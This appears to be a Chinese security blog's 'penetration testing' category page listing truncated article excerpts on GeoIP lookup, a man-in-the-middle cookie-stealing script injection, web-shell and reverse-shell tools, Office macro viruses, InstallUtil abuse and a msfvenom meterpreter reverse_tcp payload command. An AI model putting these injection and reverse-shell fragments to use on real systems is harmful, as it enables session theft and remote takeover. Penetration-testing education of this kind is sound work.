分类 渗透测试 下的文章

网上有不少IP地理位置查询的API,像ip-api.com,但为了避免造成查询服务超载,都限制了查询数,所以最好的办法还是将IP地理库下载到本地,然后进行查询。而其中IP地理库会按精确程度(其实就是更新是否及时)进行收费,当然也会好心的开放一下不用收费但没有那么准确的数据库以下介绍利用maxMind提供的免费的IP地理库来定位IP的地理位置一、GeoIP的使用第一步:安装geoipl.......

0x00 前言分享个中间人攻击姿势,屡试不爽。0x01 原理传统 cookie 嗅探,只能获得用户主动访问的站点。不访问就抓不到,效率很低。如果流量可控,不如在用户访问的页面中注入一个脚本。通过脚本,就可以请求任意站点:new Image().src = 'http://anyhost' 因为请求头部会带上 cookie,所以能把任意站点的 cookie 骗上流量,让中间人拿到。0x.......

本文向大家介绍,在使用python过程中遇到的一些奇技淫巧控制台操作控制台不闪退os.system('pause') 获取控制台大小rows, columns = os.popen('stty size', 'r').read().split() 输入输出控制解决输入提示中文乱码问题raw_input(unicode('请输入文字','utf-8').encode('gbk')) 格.......

PyCmd使用  我这里准备了2个靶机,分别装有php与jsp的运行环境,用来模拟真实的网站服务器。为了方便,我已经把服务端木马程序放到了服务器网站目录下:php网站木马地址:http://10.0.3.13/test/p.phpjsp网站木马地址:http://192.168.10.149:8080/Test/1.jsp此时,运行PyCmd.py程序:python PyCmd.py.......

在渗透测试过程中,经常会遇到一种状况:获取到了目标服务器的shell,需要进一步开展内网渗透,然而由于各种原因无法远程登录服务器,此时内网渗透往往很难开展。使用方法[HELP] PyShell.exe [-listen(-slave)] [ip] [port] #绿色免环境版 [HELP] python PyShell.py [-listen(-slave)] [i.......

需要用到csc.exe,与InstallUtil.execsc.exe是微软.NET Framework 中的C#语言编译器InstallUtil.exe是安装Windows服务工具关于两个文件默认安装位置:(注意x32,x64区别)C:\Windows\Microsoft.NET\Framework\ C:\Windows\Microsoft.NET\Framework64\ .......

渗透测试平台类:Metasploit,这个大家都不陌生了,集信息收集,预渗透,渗透,后渗透,木马,社会工程学于一体的平台,居家旅行,杀人越货之必备。SET(Social-engineer-toolkit) 主要用来做社工平台,邮件伪造,dns劫持,以及office钓鱼。Cobaltstrike,目前来说最好用的针对windows的渗透平台,也是目前最牛逼的APT协同工作平台。扩展性.......

前言Office宏,译自英文单词Macro。宏是Office自带的一种高级脚本特性,通过VBA代码,可以在Office中去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。而宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。Visual Basic f.......

0x00前言原本打算直接写在星球里的,编辑器太垃圾了。我佛了….写的烦躁,直接用博客写0x01环境windows 7:192.168.241.156kali:192.168.1.1080x02实验过程msfvenom生成32位的shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.108 LPOR.......

在日常的安全服务工作中,经常会遇到需要收集目标服务器系统信息的需求,例如:系统日志,中间件日志,系统信息等。收集这些信息,有助于分析服务器安全状况,也有利于被入侵后的取证分析。然而客户网络环境往往很复杂,服务器较多,系统版本也不尽相同,给手工收集带来了很多麻烦,因此便研究开发了服务器信息收集工具。功能介绍收集系统日志收集系统信息开机时间IP_MAC地址用户信息操作系统版本进程信息ho.......